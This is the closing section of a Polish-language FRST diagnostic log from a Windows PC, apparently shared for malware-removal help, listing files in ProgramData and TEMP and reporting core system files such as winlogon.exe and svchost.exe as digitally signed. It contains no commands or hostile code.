2017-04-08 09:11 - 2014-04-03 06:26 - 00000000 ____D C:\ProgramData\Package Cache ==================== Pliki w katalogu głównym wybranych folderów ======= 2015-08-04 19:16 - 2017-05-06 09:24 - 0000074 _____ () C:\Users\K\AppData\Roaming\sp_data.sys 2014-04-03 06:33 - 2014-04-03 06:33 - 0000000 ____H () C:\ProgramData\DP45977C.lfl 2013-12-12 23:00 - 2012-09-07 13:40 - 0000256 _____ () C:\ProgramData\SetStretch.cmd 2013-12-12 23:00 - 2009-07-22 12:04 - 0024576 _____ () C:\ProgramData\SetStretch.exe 2013-12-12 23:00 - 2012-09-07 13:37 - 0000103 _____ () C:\ProgramData\SetStretch.VBS Niektóre pliki w TEMP: ==================== 2015-12-13 22:43 - 2015-12-13 22:43 - 0071168 _____ () C:\Users\K\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmputau4e.dll 2015-08-04 20:24 - 2013-02-02 13:35 - 0560256 ____R (Microsoft Corporation) C:\Users\K\AppData\Local\Temp\OfficeSetup.exe 2015-08-04 20:24 - 2013-02-02 13:35 - 0560256 ____R (Microsoft Corporation) C:\Users\K\AppData\Local\Temp\SetupHomeStudentRetail.x86.pl-PL_HomeStudentRetail_4W6NR-8VKCR-BV7B4-XXPX2-J4Y3D_act_1_.exe 2017-04-25 21:27 - 2017-04-25 21:28 - 14065664 _____ () C:\Users\K\AppData\Local\Temp\SkypeSetup.exe 2017-04-08 09:11 - 2017-04-08 09:11 - 14456872 _____ (Microsoft Corporation) C:\Users\K\AppData\Local\Temp\vc_redist.x86.exe ==================== Bamital & volsnap ====================== (Brak automatycznej naprawy dla plików które nie przeszły weryfikacji.) C:\Windows\system32\winlogon.exe => Plik podpisany cyfrowo C:\Windows\system32\wininit.exe => Plik podpisany cyfrowo C:\Windows\explorer.exe => Plik podpisany cyfrowo C:\Windows\SysWOW64\explorer.exe => Plik podpisany cyfrowo C:\Windows\system32\svchost.exe => Plik podpisany cyfrowo C:\Windows\SysWOW64\svchost.exe => Plik podpisany cyfrowo C:\Windows\system32\services.exe => Plik podpisany cyfrowo C:\Windows\system32\User32.dll => Plik podpisany cyfrowo C:\Windows\SysWOW64\User32.dll => Plik podpisany cyfrowo C:\Windows\system32\userinit.exe => Plik podpisany cyfrowo C:\Windows\SysWOW64\userinit.exe => Plik podpisany cyfrowo C:\Windows\system32\rpcss.dll => Plik podpisany cyfrowo C:\Windows\system32\dnsapi.dll => Plik podpisany cyfrowo C:\Windows\SysWOW64\dnsapi.dll => Plik podpisany cyfrowo C:\Windows\system32\Drivers\volsnap.sys => Plik podpisany cyfrowo LastRegBack: 2017-04-29 22:51 ==================== Koniec FRST.txt ============================